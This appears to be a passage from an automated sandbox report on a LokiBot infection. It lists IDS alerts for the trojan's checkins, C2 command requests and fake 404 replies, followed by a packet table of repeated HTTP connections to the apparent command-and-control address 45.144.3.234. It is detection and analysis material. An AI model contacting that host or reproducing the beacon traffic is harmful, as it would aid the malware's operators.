                                            12/02/20-11:54:24.413582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.413582TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.413582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.556477TCP2025483ET TROJAN LokiBot Fake 404 Response804997245.144.3.234192.168.2.6
                                            12/02/20-11:54:24.870784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2025381ET TROJAN LokiBot Checkin4997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.2.645.144.3.234
                                            12/02/20-11:54:25.002434TCP2025483ET TROJAN LokiBot Fake 404 Response804997345.144.3.234192.168.2.6
                                            12/02/20-11:54:25.288195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.414858TCP2025483ET TROJAN LokiBot Fake 404 Response804997445.144.3.234192.168.2.6
                                            12/02/20-11:54:25.721544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.849073TCP2025483ET TROJAN LokiBot Fake 404 Response804997545.144.3.234192.168.2.6
                                            12/02/20-11:54:26.144787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.272979TCP2025483ET TROJAN LokiBot Fake 404 Response804997645.144.3.234192.168.2.6
                                            12/02/20-11:54:26.570983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.711049TCP2025483ET TROJAN LokiBot Fake 404 Response804997745.144.3.234192.168.2.6
                                            12/02/20-11:54:27.002604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.132331TCP2025483ET TROJAN LokiBot Fake 404 Response804997845.144.3.234192.168.2.6
                                            12/02/20-11:54:27.439600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.568900TCP2025483ET TROJAN LokiBot Fake 404 Response804997945.144.3.234192.168.2.6
                                            12/02/20-11:54:27.844926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.972228TCP2025483ET TROJAN LokiBot Fake 404 Response804998045.144.3.234192.168.2.6
                                            12/02/20-11:54:28.210753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.339983TCP2025483ET TROJAN LokiBot Fake 404 Response804998145.144.3.234192.168.2.6
                                            12/02/20-11:54:28.648579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.783734TCP2025483ET TROJAN LokiBot Fake 404 Response804998245.144.3.234192.168.2.6
                                            12/02/20-11:54:29.097570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.229926TCP2025483ET TROJAN LokiBot Fake 404 Response804998345.144.3.234192.168.2.6
                                            12/02/20-11:54:29.481369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.611300TCP2025483ET TROJAN LokiBot Fake 404 Response804998445.144.3.234192.168.2.6
                                            12/02/20-11:54:29.882166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.645.144.3.234
                                            12/02/20-11:54:30.031088TCP2025483ET TROJAN LokiBot Fake 404 Response804998545.144.3.234192.168.2.6
                                            12/02/20-11:54:30.266581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.266581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.266581TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.266581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.405566TCP2025483ET TROJAN LokiBot Fake 404 Response804998645.144.3.234192.168.2.6
                                            12/02/20-11:54:30.691282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.691282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.645.144.3.234
                                            12/02/20-11:54:30.819381TCP2025483ET TROJAN LokiBot Fake 404 Response804998745.144.3.234192.168.2.6
                                            12/02/20-11:54:31.074450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.074450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.645.144.3.234
                                            12/02/20-11:54:31.217477TCP2025483ET TROJAN LokiBot Fake 404 Response804998845.144.3.234192.168.2.6
                                            12/02/20-11:54:31.527811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.527811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.645.144.3.234
                                            12/02/20-11:54:31.656363TCP2025483ET TROJAN LokiBot Fake 404 Response804998945.144.3.234192.168.2.6
                                            12/02/20-11:54:31.972080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.645.144.3.234
                                            12/02/20-11:54:31.972080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.645.144.3.234
                                            12/02/20-11:54:32.100903TCP2025483ET TROJAN LokiBot Fake 404 Response804999045.144.3.234192.168.2.6
                                            12/02/20-11:54:32.430897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.430897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.645.144.3.234
                                            12/02/20-11:54:32.565127TCP2025483ET TROJAN LokiBot Fake 404 Response804999145.144.3.234192.168.2.6
                                            12/02/20-11:54:32.886879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.645.144.3.234
                                            12/02/20-11:54:32.886879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.645.144.3.234
                                            12/02/20-11:54:33.011949TCP2025483ET TROJAN LokiBot Fake 404 Response804999245.144.3.234192.168.2.6
                                            12/02/20-11:54:33.320496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.320496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.645.144.3.234
                                            12/02/20-11:54:33.450376TCP2025483ET TROJAN LokiBot Fake 404 Response804999345.144.3.234192.168.2.6
                                            12/02/20-11:54:33.753310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2025381ET TROJAN LokiBot Checkin4999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.753310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.2.645.144.3.234
                                            12/02/20-11:54:33.881657TCP2025483ET TROJAN LokiBot Fake 404 Response804999445.144.3.234192.168.2.6

                                            Network Port Distribution

                                            TCP Packets

                                            Dec 2, 2020 11:52:42.296176910 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317408085 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317475080 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.317636013 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.317660093 CET4971480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.370023012 CET804971445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.634788036 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.687304974 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.687475920 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.691672087 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.744510889 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.744729996 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.797485113 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818738937 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818770885 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:42.818905115 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.818957090 CET4971580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:42.873208046 CET804971545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.165004015 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.218617916 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.218766928 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.223644972 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.276274920 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.279001951 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.331955910 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.354862928 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.354908943 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.355110884 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.355134964 CET4971680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.408006907 CET804971645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.715090036 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.780569077 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.780678988 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.786463022 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.841624022 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.841705084 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.892720938 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916834116 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916851044 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:43.916938066 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.917032957 CET4971780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:43.968146086 CET804971745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.311971903 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.363648891 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.363820076 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.367507935 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.421521902 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.424026966 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.476854086 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495388985 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495414972 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.495501041 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.495568037 CET4971880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.547082901 CET804971845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.757424116 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.809986115 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.813683987 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.817785978 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.871509075 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.872364044 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.925144911 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.947917938 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.947951078 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:44.948055983 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:44.948110104 CET4972080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.000437021 CET804972045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.613316059 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.666416883 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.666527987 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.670062065 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.721982956 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.722135067 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.774557114 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795233965 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795258045 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:45.795373917 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.839304924 CET4972180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:45.891160011 CET804972145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.135173082 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.187201977 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.187385082 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.501884937 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.553736925 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.553891897 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.605909109 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626796007 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626816988 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:46.626956940 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.627440929 CET4972280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:46.679178953 CET804972245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.143943071 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.196749926 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.196885109 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.200282097 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.253904104 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.253993034 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.308057070 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331655025 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331680059 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.331810951 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.331890106 CET4972380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.384161949 CET804972345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.562874079 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.615319014 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.615433931 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.619406939 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.671931982 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.672055006 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.724229097 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748179913 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748205900 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.748323917 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.748347998 CET4972480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:47.801124096 CET804972445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:47.993343115 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.045789003 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.045932055 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.049426079 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.111053944 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.111213923 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.163687944 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184302092 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184334040 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.184492111 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.184588909 CET4972580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.238178968 CET804972545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.420404911 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.473089933 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.473290920 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.489829063 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.542267084 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.542445898 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.595082045 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616770983 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616822958 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.616942883 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.617018938 CET4972680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.669677973 CET804972645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.824300051 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.877916098 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.878339052 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.881874084 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.933549881 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:48.933732033 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:48.985455990 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007215023 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007244110 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.007407904 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.007437944 CET4972780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.059087038 CET804972745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.232285976 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.284529924 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.284663916 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.288846016 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.344180107 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.344322920 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.396284103 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418236971 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418268919 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.418683052 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.418708086 CET4972880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.471590996 CET804972845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.696527004 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.749725103 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.749869108 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.753380060 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.806351900 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.806524038 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.860044956 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881766081 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881809950 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:49.881970882 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.882067919 CET4972980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:49.934818029 CET804972945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.130819082 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.183549881 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.183809996 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.187410116 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.239682913 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.239814043 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.292112112 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313590050 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313632011 CET804973045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:52:50.313744068 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.313777924 CET4973080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:52:50.366276979 CET804973045.144.3.234192.168.2.6
